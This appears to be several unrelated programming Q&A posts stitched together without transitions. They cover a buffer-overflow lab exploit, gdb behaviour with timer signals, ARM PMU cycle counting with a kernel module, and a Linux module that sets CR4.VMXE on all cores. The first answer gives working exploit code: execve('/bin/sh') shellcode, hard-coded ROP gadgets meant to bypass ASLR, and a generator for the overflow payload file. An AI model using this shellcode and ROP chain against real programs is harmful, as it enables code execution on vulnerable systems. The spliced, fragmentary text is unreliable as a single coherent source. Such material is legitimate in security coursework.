    (void)argv;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(buffer, 0x90, sizeof buffer);

    /* You need to fill the buffer with appropriate contents here */

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    if (badfile == NULL) {
        perror("./badfile");
        return 1;
    }
    if (fwrite(buffer, sizeof buffer, 1, badfile) != 1) {
        perror("fwrite");
        fclose(badfile);
        return 1;
    }
    if (fclose(badfile) != 0) {
        perror("fclose");
        return 1;
    }
    return 0;
}
I have run gdb on my stack executable, compiled with gcc -o stack -z execstack -fno-stack-protector stack.c, and have found the buffer to be at address 0xbffff134 and ebp at 0xbffff148. I understand I have to somehow find my return address and make my payload be at that address? I would appreciate some help with the buffer overflow in this assignment.
You need to bypass ASLR; refer to the link below:
https://sploitfun.wordpress.com/2015/05/08/bypassing-aslr-part-iii/
Find gadget:
pop ebx; ret; // construct ebx value
add al, 0x08; add dword [ebx+0x5D5B04C4], eax; ret; // construct eax value
add dword [ebx+0x0804A028], esp; call dword [0x08049F1C+eax*4]
construct eax and ebx value
write the ESP value to the 0804a020 memory, then execute it
Modified exploit.c:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
/*
 * Machine-code bytes for 32-bit x86; the per-line comments give the
 * instruction each byte group encodes. The array also contains the string
 * literal's terminating NUL, so sizeof(shellcode) counts one extra byte.
 */
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdq */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
/*
 * main - fill a 517-byte buffer and write it to "./badfile".
 *
 * val views the buffer as an array of unsigned ints, so val[k] covers bytes
 * 4*k .. 4*k+3. The constants stored below are addresses and values taken
 * from one particular build of the target program.
 * NOTE(review): they are only meaningful for that exact binary -- confirm
 * against the executable actually used.
 *
 * Return: always 0; the result of fopen()/fwrite() is not checked.
 */
int main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
int i;
unsigned int *val = (unsigned int*)buffer;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
val[6] = 0x08048378; /* pop ebx; ret; */
val[7] = 0xaaa9a03c; /* ebx */
for(i=8; i<16; i++)
val[i] = 0x0804847c; /* add al, 0x08; add dword [ebx+0x5D5B04C4], eax; ret; */
val[16] = 0x08048378; /* pop ebx; ret; */
val[17] = 0xfffffff8; /* ebx */
val[18] = 0x08048462; /* add dword [ebx+0x0804A028], esp; */
/* call dword [0x08049F1C+eax*4] */
/* sizeof(shellcode) includes the array's trailing NUL byte. */
memcpy(&val[19], shellcode, sizeof(shellcode));
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
return 0;
}
I am using gdb to debug a code that starts a timer. When the timer rings in gdb I always end up at instruction timer_settime+16.
Is this expected behavior?
As an example I slightly modified the code of timer_settime man page. The idea is to pass two arguments: a string of integers and a nsec value. The code launches the timer to ring after nsec, then copies the string.
I expected that, by incrementing the nsec value, gdb would stop at different code lines and eventually end up inside the copy loop. However, it always stops at timer_settime+16.
So is this expected behavior?
Is it documented somewhere?
Is there a way to achieve what I expected (i.e.: launch a timer that when ring makes gdb stops where the program was just before (or after) the signal)? (always with nsec granularity).
Code:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <signal.h>
#include <time.h>
/* Clock the timer is created on. */
#define CLOCKID CLOCK_REALTIME
/* Signal delivered when the timer expires. */
#define SIG SIGUSR1
/* Report msg through perror() and terminate with EXIT_FAILURE. */
#define errExit(msg) do { perror(msg); exit(EXIT_FAILURE); \
} while (0)
/* Destination and source buffers for testcode(); IN is filled from argv[1]. */
unsigned char OUT[32];
unsigned char IN[32];
/*
 * ascii2hex - convert one hexadecimal digit character to its value.
 * @in: character '0'-'9', 'A'-'F' or 'a'-'f'.
 *
 * Return: the digit value 0-15, or 0 when @in is not a hexadecimal digit
 * (previously the result was uninitialized in that case).
 */
unsigned char ascii2hex(char in){
    if( ('0' <= in) && (in <= '9') )
        return (unsigned char)(in - '0');
    if( ('A' <= in) && (in <= 'F') )
        return (unsigned char)(in - 'A' + 10);
    if( ('a' <= in) && (in <= 'f') )
        return (unsigned char)(in - 'a' + 10);
    return 0;
}

/*
 * asciiStr2hex - convert a string of hex digits into bytes.
 * @in:  NUL-terminated string of hexadecimal digits.
 * @out: receives one byte per pair of digits; needs room for (len + 1) / 2
 *       bytes.
 * @len: maximum number of characters of @in to consume.
 *
 * Conversion stops early at the end of the string, so a string shorter than
 * @len is never read past its terminator; a trailing unpaired digit is
 * dropped and the remaining bytes of @out are left untouched.
 */
void asciiStr2hex(char * in, unsigned char * out, unsigned int len){
    unsigned int i;
    unsigned int j = 0;

    for( i = 0; i < len; i+=2){
        /* Need a full pair of digits before the terminator. */
        if( in[i] == '\0' || in[i+1] == '\0' )
            break;
        out[j++] = (unsigned char)((ascii2hex(in[i]) << 4) + ascii2hex(in[i+1]));
    }
}
/*
 * testcode - byte-by-byte copy of len bytes from in to out.
 *
 * Deliberately written as an explicit loop: this is the code the timer
 * signal is supposed to interrupt.
 */
void testcode(unsigned char *out, unsigned char *in, unsigned int len){
    unsigned char *dst = out;
    unsigned char *src = in;
    unsigned int remaining = len;

    while (remaining > 0) {
        *dst = *src;
        dst++;
        src++;
        remaining--;
    }
}
/*
 * print_siginfo - print the timer that raised the signal and its overrun count.
 * @si: signal information; si_value.sival_ptr must point to the timer_t.
 *
 * Terminates the process through errExit() if timer_getoverrun() fails.
 */
static void print_siginfo(siginfo_t *si)
{
    timer_t *timer_ref = si->si_value.sival_ptr;
    int overruns;

    printf(" sival_ptr = %p; ", si->si_value.sival_ptr);
    printf(" *sival_ptr = 0x%lx\n", (long) *timer_ref);

    overruns = timer_getoverrun(*timer_ref);
    if (overruns == -1) {
        errExit("timer_getoverrun"); /* does not return */
    }
    printf(" overrun count = %d\n", overruns);
}
/*
 * handler - SA_SIGINFO handler for the timer signal.
 * @sig: signal number that was delivered.
 * @si:  signal details, forwarded to print_siginfo().
 * @uc:  user context; not used.
 *
 * Reports the signal and then sets its disposition to SIG_IGN, so later
 * expirations of the timer are ignored.
 */
static void handler(int sig, siginfo_t *si, void *uc)
{
    (void) uc;

    /* printf() is not async-signal-safe (see signal(7)), so calling it
       from a handler is not strictly correct. */
    printf("Caught signal %d\n", sig);
    print_siginfo(si);

    signal(sig, SIG_IGN);
}
int main(int argc, char *argv[])
{
timer_t timerid;
struct sigevent sev;
struct itimerspec its;
long long freq_nanosecs;
//sigset_t mask;
struct sigaction sa;
if (argc != 3) {
fprintf(stderr, "Usage: %s <16byte> <time-nanosecs>\n",
argv[0]);
exit(EXIT_FAILURE);
}
asciiStr2hex(argv[1], IN, 32);
/* Establish handler for timer signal */
printf("Establishing handler for signal %d\n", SIG);
sa.sa_flags = SA_SIGINFO;
sa.sa_sigaction = handler;
sigemptyset(&sa.sa_mask);
if (sigaction(SIG, &sa, NULL) == -1)
errExit("sigaction");
/* Block timer signal temporarily */
/* printf("Blocking signal %d\n", SIG);
sigemptyset(&mask);
sigaddset(&mask, SIG);
if (sigprocmask(SIG_SETMASK, &mask, NULL) == -1)
errExit("sigprocmask");
*/
/* Create the timer */
sev.sigev_notify = SIGEV_SIGNAL;
sev.sigev_signo = SIG;
sev.sigev_value.sival_ptr = &timerid;
if (timer_create(CLOCKID, &sev, &timerid) == -1)
errExit("timer_create");
printf("timer ID is 0x%lx\n", (long) timerid);
/* Start the timer */
freq_nanosecs = atoll(argv[2]);
its.it_value.tv_sec = freq_nanosecs / 1000000000;
its.it_value.tv_nsec = freq_nanosecs % 1000000000;
its.it_interval.tv_sec = its.it_value.tv_sec;
its.it_interval.tv_nsec = its.it_value.tv_nsec;
if (timer_settime(timerid, 0, &its, NULL) == -1)
errExit("timer_settime");
/* Sleep for a while; meanwhile, the timer may expire
multiple times */
printf("Sleeping for %d seconds\n", atoi(argv[1]));
testcode(OUT, IN, 16);
/* Unlock the timer signal, so that timer notification
can be delivered */
/* printf("Unblocking signal %d\n", SIG);
if (sigprocmask(SIG_UNBLOCK, &mask, NULL) == -1)
errExit("sigprocmask");
*/
exit(EXIT_SUCCESS);
}
When debug into gdb with r 00112233445566778899001122334455 2
I obtain:
Program received signal SIGUSR1, User defined signal 1.
0x76fc7c38 in timer_settime () from /lib/arm-linux-gnueabihf/librt.so.1
(gdb) x/30i $pc
=> 0x76fc7c38 <timer_settime+16>: cmn r0, #4096 ; 0x1000
0x76fc7c3c <timer_settime+20>: mov r4, r0
0x76fc7c40 <timer_settime+24>: bhi 0x76fc7c4c <timer_settime+36>
0x76fc7c44 <timer_settime+28>: mov r0, r4
0x76fc7c48 <timer_settime+32>: pop {r3, r4, r7, pc}
0x76fc7c4c <timer_settime+36>: bl 0x76fc55b4
0x76fc7c50 <timer_settime+40>: rsb r3, r4, #0
0x76fc7c54 <timer_settime+44>: mvn r4, #0
0x76fc7c58 <timer_settime+48>: str r3, [r0]
0x76fc7c5c <timer_settime+52>: b 0x76fc7c44 <timer_settime+28>
0x76fc7c60 <timer_settime+56>: andeq r0, r0, r2, lsl #2
0x76fc7c64: push {r4, r5, r6, r7, r8, r9, r10, lr}
0x76fc7c68: sub sp, sp, #600 ; 0x258
0x76fc7c6c: ldr r4, [pc, #340] ; 0x76fc7dc8
0x76fc7c70: add r1, sp, #512 ; 0x200
0x76fc7c74: add r4, pc, r4
0x76fc7c78: mov r0, r4
0x76fc7c7c: bl 0x76fc56b0
0x76fc7c80: cmp r0, #0
0x76fc7c84: bne 0x76fc7c98
0x76fc7c88: ldr r2, [sp, #512] ; 0x200
0x76fc7c8c: ldr r3, [pc, #312] ; 0x76fc7dcc
0x76fc7c90: cmp r2, r3
0x76fc7c94: beq 0x76fc7d94
0x76fc7c98: ldr r5, [pc, #304] ; 0x76fc7dd0
0x76fc7c9c: ldr r0, [pc, #304] ; 0x76fc7dd4
0x76fc7ca0: add r5, pc, r5
0x76fc7ca4: add r0, pc, r0
0x76fc7ca8: mov r1, r5
0x76fc7cac: bl 0x76fc5524
I am running this code on a Raspberry Pi, but I'm pretty sure I saw the same behavior on another Linux machine (x86_64).
I have tested with "handle stop SIGUSR1".
I finally found that the problem was that I have to set unwindonsignal off in gdb to obtain the behavior I expected.
I was using following method to read clock in cortex-a15:
/*
 * readticks - sample a CP15 counter register together with the wall clock.
 * @result: array of at least three elements:
 *          result[0] = value read from CP15 c9, c13, 0,
 *          result[1] = microseconds part of gettimeofday(),
 *          result[2] = seconds part of gettimeofday().
 *
 * On the first call (file-level flag enabled == 0) three CP15 registers are
 * written to start the counters.
 */
static void readticks(unsigned int *result)
{
struct timeval t;
unsigned int cc;
if (!enabled) {
// program the performance-counter control-register:
// (17 = 0x11, i.e. bits 0 and 4 set)
asm volatile("mcr p15, 0, %0, c9, c12, 0" :: "r"(17));
//enable all counters
asm volatile("mcr p15, 0, %0, c9, c12, 1" :: "r"(0x8000000f));
//Clear overflow.
asm volatile("mcr p15, 0, %0, c9, c12, 3" :: "r"(0x8000000f));
enabled = 1;
}
// read the counter value (presumably the cycle counter -- confirm)
asm volatile("mrc p15, 0, %0, c9, c13, 0" : "=r"(cc));
gettimeofday(&t,(struct timezone *) 0);
result[0] = cc;
result[1] = t.tv_usec;
result[2] = t.tv_sec;
}
And the final performance profiling looks like:
before = readticks();
foo();
after = readticks();
clock_cycles = after - before.
I want to use same logic in cortex-A53, ARM64 (not aarch32).
I have tried this after following online portals:
/*
 * Bit positions in the PMCR_EL0 control register.
 * NOTE(review): QUADD_ARMV8_PMCR_WR_MASK, used by armv8_pmu_pmcr_write(), is
 * not defined in this snippet -- it has to come from elsewhere.
 */
/* All counters, including PMCCNTR_EL0, are disabled/enabled */
#define QUADD_ARMV8_PMCR_E (1 << 0)
/* Reset all event counters, not including PMCCNTR_EL0, to 0
*/
#define QUADD_ARMV8_PMCR_P (1 << 1)
/* Reset PMCCNTR_EL0 to 0 */
#define QUADD_ARMV8_PMCR_C (1 << 2)
/* Clock divider: PMCCNTR_EL0 counts every clock cycle/every 64 clock cycles */
#define QUADD_ARMV8_PMCR_D (1 << 3)
/* Export of events is disabled/enabled */
#define QUADD_ARMV8_PMCR_X (1 << 4)
/* Disable cycle counter, PMCCNTR_EL0 when event counting is prohibited */
#define QUADD_ARMV8_PMCR_DP (1 << 5)
/* Long cycle count enable */
#define QUADD_ARMV8_PMCR_LC (1 << 6)
/*
 * armv8_pmu_pmcr_read - read the PMCR_EL0 system register.
 *
 * Return: the register value as an unsigned int.
 */
static inline unsigned int armv8_pmu_pmcr_read(void)
{
unsigned int val;
/* Read Performance Monitors Control Register */
asm volatile("mrs %0, pmcr_el0" : "=r" (val));
return val;
}
/*
 * armv8_pmu_pmcr_write - write PMCR_EL0.
 * @val: new register value; it is AND-ed with QUADD_ARMV8_PMCR_WR_MASK before
 *       being written.
 */
static inline void armv8_pmu_pmcr_write(unsigned int val)
{
asm volatile("msr pmcr_el0, %0" : :"r" (val & QUADD_ARMV8_PMCR_WR_MASK));
}
/*
 * enable_all_counters - read-modify-write of PMCR_EL0 that sets the E
 * (enable) and X (export) bits and leaves every other bit as read.
 */
static void enable_all_counters(void)
{
    const unsigned int wanted = QUADD_ARMV8_PMCR_E | QUADD_ARMV8_PMCR_X;
    const unsigned int current = armv8_pmu_pmcr_read();

    armv8_pmu_pmcr_write(current | wanted);
}
/*
 * reset_all_counters - read-modify-write of PMCR_EL0 that sets the P (reset
 * event counters) and C (reset cycle counter) bits.
 */
static void reset_all_counters(void)
{
    const unsigned int wanted = QUADD_ARMV8_PMCR_P | QUADD_ARMV8_PMCR_C;
    const unsigned int current = armv8_pmu_pmcr_read();

    armv8_pmu_pmcr_write(current | wanted);
}
static void readticks(unsigned int *result)
{
struct timeval t;
unsigned int cc;
unsigned int val;
if (!enabled) {
reset_all_counters();
enable_all_counters();
enabled = 1;
}
cc = armv8_pmu_pmcr_read();
gettimeofday(&t,(struct timezone *) 0);
result[0] = cc;
result[1] = t.tv_usec;
result[2] = t.tv_sec;
}
But it gives "Illegal instruction" as error while I am trying profiling. Can anyone help me to change the above code for cortex-a53?
You need to enable the PMU for user mode. Here is the kernel module I wrote for it (for ARMv7 on a Raspberry Pi 2):
/* Module source file 'module.c'. */
#include <linux/module.h>
#include <linux/init.h>
#include <linux/kernel.h>
/*
 * arm_write - write val to CP15 register c9, c14, 0.
 * @val: value to write; the caller in this module passes 1 to enable
 *       user-mode access to the PMU.
 *
 * Only the mcr (ARM register -> coprocessor) instruction is needed. The
 * earlier extra mrc transferred in the opposite direction and overwrote a
 * register that was declared as an input, which the compiler was not told
 * about. The function also has an explicit return type now.
 */
void arm_write(unsigned long val)
{
    asm volatile("mcr p15, 0, %0, c9, c14, 0" :: "r"(val));
}
/*
 * enabler - module init hook: logs a message and writes 1 through arm_write().
 *
 * NOTE(review): this runs on whichever CPU loads the module -- confirm
 * whether the register has to be written on every core.
 *
 * Return: always 0.
 */
static int enabler(void)
{
    const unsigned long enable_value = 1;

    printk(KERN_INFO "Enabling PMU usermode.\n");
    arm_write(enable_value);

    return 0;
}
/*
 * end - module exit hook. Only logs a message; the register written at load
 * time is not changed back.
 */
static void end(void)
{
printk(KERN_INFO "module unloaded.\n");
}
/* Register the load/unload hooks and the module metadata. */
module_init(enabler);
module_exit(end);
MODULE_AUTHOR("Sama");
MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("Blahblah");
This will enable user-mode access to the PMU. Once you have compiled it, you need to enable the PMU counters as follows:
/*
 * main - configure the ARMv7 PMU from user space and print event counter 0.
 *
 * Builds the control-register value (enable, optional resets, optional
 * divide-by-64, plus bit 4), enables the counters, clears overflow flags,
 * selects counter 0, programs its event number and reads it back once.
 * Requires that user-mode PMU access has already been enabled by the kernel.
 *
 * Fix: the counter was printed with "%ul", which prints the number followed
 * by a literal 'l'; the conversion for unsigned int is "%u".
 */
int main(int argc, char **argv){
    int enable_divider = 1;
    int do_reset = 1;
    int value = 1; /* bit 0: enable */
    unsigned int output;

    (void)argc;
    (void)argv;

    // perform reset:
    if (do_reset) {
        value |= 2; // reset all counters to zero.
        value |= 4; // reset cycle counter to zero.
    }
    if (enable_divider) {
        // enable "by 64" divider for CCNT: the cycle counter then
        // increments by 1 for every 64 cpu cycles.
        value |= 8;
    }
    value |= 16; // always set, independent of enable_divider

    // program the performance-counter control-register with mask constructed above
    asm volatile ("MCR p15, 0, %0, c9, c12, 0\t\n" :: "r"(value));
    // enable all counters:
    asm volatile ("MCR p15, 0, %0, c9, c12, 1\t\n" :: "r"(0x8000000f));
    // clear overflows:
    asm volatile ("MCR p15, 0, %0, c9, c12, 3\t\n" :: "r"(0x80000001));
    // Select individual counter (0)
    asm volatile ("MCR p15, 0, %0, c9 , c12 , 5\t\n":: "r"(0x00));
    // Write event number 0xD.
    // NOTE(review): the earlier comment said "0x11 = Cycle count" while the
    // code writes 0xD -- confirm which event is intended.
    asm volatile ("MCR p15, 0, %0, c9 , c13 , 1\t\n":: "r"(0xD));

    printf("Hi");

    // Read current event counter
    asm volatile ("MRC p15, 0, %0, c9 , c13 , 2\t\n": "=r"(output));
    printf("Event count 0: %u\n", output);
    printf("Normal Execution, No Buffer Overflow Occurred.\n");
    return 0;
}
Unfortunately, however, what you get is not only your program's CPU cycles but the CPU cycles of the entire system. So what I recommend is to use perf.
Write your asm code in an inline assembly code in C and then put it like this:
/*
 * dummya - template that counts user-space CPU cycles around a code region
 * with the perf_event interface.
 * @z: unused placeholder parameter.
 * @b: unused placeholder parameter.
 *
 * Opens a hardware CPU-cycles counter for the calling thread (kernel and
 * hypervisor excluded), resets and enables it, runs the placeholder asm
 * statements, disables the counter and prints its value.
 *
 * The result of read() is now checked: previously a failed or short read
 * printed an uninitialized count.
 *
 * Return: always 5. Exits with EXIT_FAILURE if the counter cannot be opened
 * or read.
 */
int dummya(int z, int b){
    //This is my function you need to change it for yourself
    struct perf_event_attr pe;
    long long count = 0;
    int fd;

    (void)z;
    (void)b;

    memset(&pe, 0, sizeof(struct perf_event_attr));
    pe.type = PERF_TYPE_HARDWARE;
    pe.size = sizeof(struct perf_event_attr);
    pe.config = PERF_COUNT_HW_CPU_CYCLES;
    pe.disabled = 1;       /* start stopped; enabled explicitly below */
    pe.exclude_kernel = 1;
    pe.exclude_hv = 1;

    fd = perf_event_open(&pe, 0, -1, -1, 0);
    if (fd == -1) {
        fprintf(stderr, "Error opening leader %llx\n", pe.config);
        exit(EXIT_FAILURE);
    }

    ioctl(fd, PERF_EVENT_IOC_RESET, 0);
    ioctl(fd, PERF_EVENT_IOC_ENABLE, 0);
    //From here the counter starts.
    asm("Your ASM Codes");
    asm("Your ASM Codes");
    asm("Your ASM Codes");
    asm("Your ASM Codes");
    asm("Your ASM Codes");
    asm("Your ASM Codes");
    asm("Your ASM Codes");
    asm("Your ASM Codes");
    //Disabling Counter
    ioctl(fd, PERF_EVENT_IOC_DISABLE, 0);

    if (read(fd, &count, sizeof(long long)) != (ssize_t)sizeof(long long)) {
        fprintf(stderr, "Error reading counter\n");
        close(fd);
        exit(EXIT_FAILURE);
    }
    printf("%lld\n", count);
    close(fd);
    return 5;
}
Be advised that you need a recent kernel to access the perf driver.
The following simple kernel module sets the 13th bit of the cr4 register (CR4.VMXE) once it is loaded and clears the bit on exit.
vmx.c
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
MODULE_LICENSE("GPL");
/* Read the CR4 control register of the executing CPU and return its value. */
static inline uint64_t getcr4(void) {
    uint64_t cr4_value = 0;

    asm volatile ("movq %%cr4, %[out]\n" : [out] "=r"(cr4_value));
    return cr4_value;
}
/* Load val into the CR4 control register of the executing CPU. */
static inline void setcr4(register uint64_t val) {
    asm volatile ("movq %[in], %%cr4\n" : /* no outputs */ : [in] "r"(val));
}
/*
 * Module load hook: log CR4, set bit 13 (CR4.VMXE) through setcr4, then log
 * the value read back. Only the CPU executing this function is touched.
 * Always returns 0.
 */
static int __init init_routine(void) {
    const uint64_t vmxe_mask = 1ULL << 13;
    uint64_t before = getcr4();
    uint64_t after;

    printk(KERN_INFO "VTX Test loaded: %llu (%u).\n", before, (unsigned char)((before >> 13) & 1));

    setcr4(before | vmxe_mask);
    after = getcr4();

    printk(KERN_INFO "cr4: %llu (%u).\n", after, (unsigned char)((after >> 13) & 1));
    return 0;
}
/*
 * Module unload hook: log CR4, clear bit 13 (CR4.VMXE) through setcr4, then
 * log the value read back. Only the CPU executing this function is touched.
 */
static void __exit exit_routine(void) {
    const uint64_t vmxe_mask = 1ULL << 13;
    uint64_t before = getcr4();
    uint64_t after;

    printk(KERN_INFO "cr4: %llu (%u).\n", before, (unsigned char)((before >> 13) & 1));

    setcr4(before & ~vmxe_mask);
    after = getcr4();

    printk(KERN_INFO "VTX Test exited: %llu (%u).\n", after, (unsigned char)((after >> 13) & 1));
}
/* Register init_routine as the function run when the module is loaded. */
module_init(init_routine);
/* Register exit_routine as the function run when the module is removed. */
module_exit(exit_routine);
Makefile
# Out-of-tree build of vmx.ko against the running kernel's build directory.
obj-m += vmx.o

# Neither target produces a file with its own name.
.PHONY: all clean

# $(MAKE) rather than a literal "make" so that flags such as -j and -n are
# passed on to the kernel build.
all:
	$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
	$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
To run the module I use make clean && make && sudo insmod vmx.ko && sudo rmmod vmx && sudo dmesg -c. This sometimes gives me the following (expected) output:
[ 2295.121537] VTX Test loaded: 1312736 (0).
[ 2295.121540] cr4: 1320928 (1).
[ 2295.123975] cr4: 1320928 (1).
[ 2295.123977] VTX Test exited: 1312736 (0).
And sometimes also the following:
[ 2296.256982] VTX Test loaded: 1320928 (1).
[ 2296.256984] cr4: 1320928 (1).
[ 2296.259481] cr4: 1312736 (0).
[ 2296.259483] VTX Test exited: 1312736 (0).
The second and third lines of the second output seem strange to me, because it looks as if the modified control register cr4 has been reset after leaving init_routine. Additionally, it is strange that in the first line the VMXE bit already seems to be set, which doesn't really make any sense. Is this behavior normal? How can it be explained? Could there be another kernel module running which modifies CR4? This seems rather strange, because I've seen several VTX implementations and they all set the VMXE bit in their initialization routine and clear the bit in their exit routine in the same fashion as this module.
As it turns out, the problem is that the register is not modified on all CPU cores. To ensure that the modifications happen on all cores it seems to be enough to invoke on_each_cpu. Fixed code below, Makefile unchanged.
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
MODULE_LICENSE("GPL");
/* Return the current contents of the executing CPU's CR4 control register. */
static inline uint64_t getcr4(void) {
    uint64_t cr4_value = 0;

    asm volatile ("movq %%cr4, %[out]\n" : [out] "=r"(cr4_value));
    return cr4_value;
}
/* Write val to the executing CPU's CR4 control register. */
static inline void setcr4(register uint64_t val) {
    asm volatile ("movq %[in], %%cr4\n" : /* no outputs */ : [in] "r"(val));
}
/*
 * Callback handed to on_each_cpu: set bit 13 (CR4.VMXE) in the CR4 of the
 * CPU it runs on. info is not used.
 */
static void setvmxe(void* info) {
    setcr4(getcr4() | (1ULL << 13));
}
/*
 * Callback handed to on_each_cpu: clear bit 13 (CR4.VMXE) in the CR4 of the
 * CPU it runs on. info is not used.
 */
static void clearvmxe(void* info) {
    setcr4(getcr4() & ~(1ULL << 13));
}
/*
 * Module load hook: log the local CPU's CR4, run setvmxe on every CPU via
 * on_each_cpu, then log the local CPU's CR4 again.
 *
 * Always returns 0.
 */
static int __init init_routine(void) {
    uint64_t cr4 = getcr4();
    printk(KERN_INFO "VTX Test loaded: %llu (%u).\n", cr4, (unsigned char)((cr4 >> 13) & 1));
    /*
     * wait=1: do not continue until setvmxe has finished on all CPUs, so
     * the bit is guaranteed to be set everywhere once init returns.
     */
    on_each_cpu(setvmxe, NULL, 1);
    cr4 = getcr4();
    printk(KERN_INFO "cr4: %llu (%u).\n", cr4, (unsigned char)((cr4 >> 13) & 1));
    return 0;
}
/*
 * Module unload hook: log the local CPU's CR4, run clearvmxe on every CPU
 * via on_each_cpu, then log the local CPU's CR4 again.
 */
static void __exit exit_routine(void) {
    uint64_t cr4 = getcr4();
    printk(KERN_INFO "cr4: %llu (%u).\n", cr4, (unsigned char)((cr4 >> 13) & 1));
    /*
     * wait=1 is required here: clearvmxe lives in this module's text, which
     * is freed once the exit routine returns. Without waiting, another CPU
     * could still be about to execute the callback after it has been
     * unloaded.
     */
    on_each_cpu(clearvmxe, NULL, 1);
    cr4 = getcr4();
    printk(KERN_INFO "VTX Test exited: %llu (%u).\n", cr4, (unsigned char)((cr4 >> 13) & 1));
}
/* Register init_routine as the function run when the module is loaded. */
module_init(init_routine);
/* Register exit_routine as the function run when the module is removed. */
module_exit(exit_routine);
You probably have the kvm kernel module (and the associated kvm-intel or kvm-amd module) loaded. These modules already manage the processor's VT state, and are likely to be very confused if you start modifying it elsewhere.
Take a look at the arch/x86/kvm directory in the kernel source to get a sense of what already exists.